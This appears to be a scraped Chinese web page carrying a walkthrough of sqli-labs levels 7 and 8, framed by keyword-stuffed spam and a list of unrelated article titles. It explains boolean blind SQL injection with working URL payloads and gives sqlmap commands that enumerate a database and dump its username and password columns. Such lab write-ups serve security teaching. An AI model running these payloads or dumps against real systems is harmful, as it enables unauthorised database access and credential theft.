当前位置: 首页 > wzjs >正文

动态网站设计都有什么属性百度2019旧版本下载

动态网站设计都有什么属性,百度2019旧版本下载,外贸推广有哪些好的方式,wordpress文章无法显示第七关1.审题这里判断出是))闭合,但是页面只有正确和错误的回显状态,报错的回显也是固定的,没有显示报错具体信息。这关使用的方法是布尔盲注。为什么叫布尔盲注?因为它返回的结果只有true和false 两个值,攻击者需要通…

第七关

1.审题

这里判断出是'))闭合,但是页面只有正确和错误的回显状态,报错的回显也是固定的,没有显示报错具体信息。

这关使用的方法是布尔盲注。为什么叫布尔盲注?因为它返回的结果只有true和false 两个值,攻击者需要通过返回的布尔值去猜测结果,就像盲人一样。

2.思考

(1)猜长度

length()函数是计算字符串长度,先构造一个简单的语句。

//判断当前数据库名的字符串长度是否大于10;
?id=1')) and length(database()) > 10 --+

通过页面回显,可以判断数据库名称长度大于5但是小于10,利用二分法最后猜测出数据库名的长为8个字符。

已经知道了数据库名的长,假设再去猜测每一位上的字符,是不是就可以得到数据库名称。

(2)猜位的字符

substr()函数作用是截取指定位置的字符,ascii()函数作用是返回字符的ascii码值(0-255范围的整数)。

//判断数据库名称的第一位字符是否在大写字母范围内;
?id=1')) and ascii(substr(database(),1,1)) between 65 and 90--+

虽然ascii码的值是从0-255,但字母A-Z的范围是65-90,a-z范围是97-122。首先判断字符是不是字母,然后进一步缩小猜测范围。

这里判断出第一位字符是小写字母,再利用二分法猜测具体字母,最后得出首字符是s。

那么通过逐步猜测,就可以拿到数据库的名称。再结合limit()函数去枚举数据库下的表名,字段,最后拿到想要的数据。

//查询当前数据库下第一张表的首位字符是否为小写字母;
?id=1')) and 
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)
) 
between 97 and 122 --+

3.做法

(1)手工注入

根据思考的逻辑去逐步猜测数据。

(2)工具注入

 sqlmap的简单使用

//查询数据库

sqlmap -u 'http://xx.xx.xx/?id=1' --dbs

//查询指定数据库security中的表

sqlmap -u 'http://xx.xx.xx/?id=1' -D'security' --tables

//查询指定表users中的字段

sqlmap -u 'http://xx.xx.xx/?id=1' -D'security' -T'users' --columns

//查询指定字段的数据

sqlmap -u 'http://xx.xx.xx/?id=1' -D'security' -T'users'  -C'username,password' --dump

 

第8关

这里也只有两种页面显示,图二没有任何回显,但可以理解为报错,实际上这关把输出报错的代码注释掉了。

判断出是单引号闭合,利用布尔盲注解题。

http://www.dtcms.com/wzjs/46334.html

相关文章:

  • 高端网站定制设计公司模板建站平台
  • 网站开发建设价格附件自媒体十大平台
  • 公司做网站找谁公司做网站找谁网站推广计划书范文
  • 网页设计教程详细步骤南京seo域名
  • 金融网站建设多少钱百度指数怎么做
  • 网站项目报价单模板开封网站优化公司
  • idc 公司网站模板手机怎么创建自己的网站平台
  • 响应式网站模板html5接单平台
  • 保定市建设局质监站网站抖音指数
  • 哪个网站好自建站怎么推广
  • 网络购物系统标题优化
  • 艺术网站欣赏香港疫情最新情况
  • 合肥建设网网站百度指数是啥
  • html怎么设置网页背景图片优化培训方式
  • 佛山网站建设优化制作公司吸引人的营销标题
  • 衢州 网站建设报个电脑培训班要多少钱
  • 做印刷网站公司哪家好seo研究中心官网
  • 如何做网站用户活跃度校园推广方案
  • 电商网站开发助理百度竞价托管外包
  • 怎么自己做APP网站个人发布信息免费推广平台
  • 网站美工费用站长之家网站介绍
  • 网站地图深度做多少合适提升神马关键词排名报价
  • 3 阐述网站建设的步骤过程百度文库首页官网
  • 用php做网站和java做网站一句话让客户主动找你
  • 网页网站设计与制作外包seo服务收费标准
  • 静态网页的制作百度seo整站优化
  • 潍坊网站制作最低价格官方网站怎么查询
  • 成品软件网站推荐百度app交易平台
  • 建设思政教育网站案例山东企业网站建设
  • 二手站网站怎做百度老年搜索